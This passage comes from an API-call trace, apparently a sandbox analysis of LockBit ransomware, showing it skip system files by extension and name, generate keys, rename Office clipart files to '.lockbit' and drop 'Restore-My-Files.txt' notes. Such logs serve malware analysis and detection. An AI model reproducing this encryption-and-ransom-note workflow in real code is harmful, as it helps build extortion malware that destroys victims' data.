lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.169] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281630.WMF") returned 1 [0154.170] lstrcmpiW (lpString1="ntldr", lpString2="J0281630.WMF") returned 1 [0154.170] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281630.WMF") returned 1 [0154.170] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281630.WMF") returned -1 [0154.170] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281630.WMF") returned -1 [0154.170] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281630.WMF") returned 1 [0154.170] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281630.WMF") returned -1 [0154.170] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.170] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF") returned=".WMF" [0154.170] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.170] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.170] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.171] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.171] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF.lockbit") returned 72 [0154.171] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281630.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.187] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.187] malloc (_Size=0x40068) returned 0x3df0008 [0154.187] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=12764) returned 1 [0154.187] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.188] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.188] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.188] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.188] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.193] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.193] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.193] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0154.195] free (_Block=0x1fa2ed8) [0154.195] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281630.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.195] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.195] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.195] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7da6a400, ftCreationTime.dwHighDateTime=0x1bee442, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x7da6a400, ftLastWriteTime.dwHighDateTime=0x1bee442, nFileSizeHigh=0x0, nFileSizeLow=0x3854, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281632.WMF", cAlternateFileName="")) returned 1 [0154.195] lstrcmpiW (lpString1=".", lpString2="J0281632.WMF") returned -1 [0154.195] lstrcmpiW (lpString1="..", lpString2="J0281632.WMF") returned -1 [0154.195] PathFindExtensionW (pszPath="J0281632.WMF") returned=".WMF" [0154.195] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.195] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.195] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.195] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.196] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.197] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.197] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281632.WMF") returned 1 [0154.198] lstrcmpiW (lpString1="ntldr", lpString2="J0281632.WMF") returned 1 [0154.198] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281632.WMF") returned 1 [0154.198] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281632.WMF") returned -1 [0154.198] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281632.WMF") returned -1 [0154.198] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281632.WMF") returned 1 [0154.198] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281632.WMF") returned -1 [0154.198] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.198] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF") returned=".WMF" [0154.198] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.198] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.198] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.199] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.199] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF.lockbit") returned 72 [0154.199] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281632.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.200] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.200] malloc (_Size=0x40068) returned 0x3df0008 [0154.201] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14420) returned 1 [0154.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.201] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.201] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.201] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.202] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.202] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.202] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0154.206] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.207] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.208] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0154.208] free (_Block=0x1fa2ed8) [0154.208] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281632.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.208] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.208] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0154.208] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x87300c00, ftCreationTime.dwHighDateTime=0x1bee442, ftLastAccessTime.dwLowDateTime=0x660f04f0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x87300c00, ftLastWriteTime.dwHighDateTime=0x1bee442, nFileSizeHigh=0x0, nFileSizeLow=0x2e88, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0281638.WMF", cAlternateFileName="")) returned 1 [0154.208] lstrcmpiW (lpString1=".", lpString2="J0281638.WMF") returned -1 [0154.208] lstrcmpiW (lpString1="..", lpString2="J0281638.WMF") returned -1 [0154.208] PathFindExtensionW (pszPath="J0281638.WMF") returned=".WMF" [0154.208] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0154.208] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0154.209] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0154.209] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0281638.WMF") returned 1 [0154.210] lstrcmpiW (lpString1="ntldr", lpString2="J0281638.WMF") returned 1 [0154.210] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0281638.WMF") returned 1 [0154.210] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0281638.WMF") returned -1 [0154.210] lstrcmpiW (lpString1="autorun.inf", lpString2="J0281638.WMF") returned -1 [0154.210] lstrcmpiW (lpString1="thumbs.db", lpString2="J0281638.WMF") returned 1 [0154.210] lstrcmpiW (lpString1="iconcache.db", lpString2="J0281638.WMF") returned -1 [0154.210] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0154.210] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF") returned=".WMF" [0154.210] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0154.210] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0154.210] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0154.211] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0154.212] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0154.212] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF.lockbit") returned 72 [0154.212] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0281638.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x2a8 [0154.213] CreateIoCompletionPort (FileHandle=0x2a8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0154.213] malloc (_Size=0x40068) returned 0x3df0008 [0154.213] GetFileSizeEx (in: hFile=0x2a8, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=11912) returned 1 [0154.213] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0154.214] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0154.214] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0154.214] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0154.214] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0154.219] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0154.219] malloc (_Size=0xa6) returned 0x1fa2ed8 [0154.219] NtSetInformationFile (FileHandle=0x2a8, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0154.221] free (_Block=0x1fa2ed8) [0154.221] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0281638.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0154.221] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0154.221] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, 